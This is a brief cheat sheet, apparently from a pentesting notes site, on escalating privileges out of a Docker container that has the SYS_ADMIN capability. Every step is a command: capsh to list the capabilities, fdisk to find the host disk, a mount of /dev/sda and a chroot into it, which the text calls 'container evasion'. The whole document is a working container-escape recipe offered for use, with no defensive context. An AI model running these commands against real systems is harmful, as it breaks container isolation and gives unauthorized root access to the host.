Docker - Escalation of privileges - Capabilities

  • Escalation

Inside a container, list the capabilities:

capsh --print

 

Check the possible rights :

Example: SYS_ADMIN

List of capabilities: https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities

 

With the SYS_ADMIN (Perform a range of system administration operations.) capability, it is possible to mount disks (among others).

 

List the disks:

fdisk -l

 

Mount the disk:

mount /dev/sda /mnt/

 

Container evasion:

​chroot /mnt bash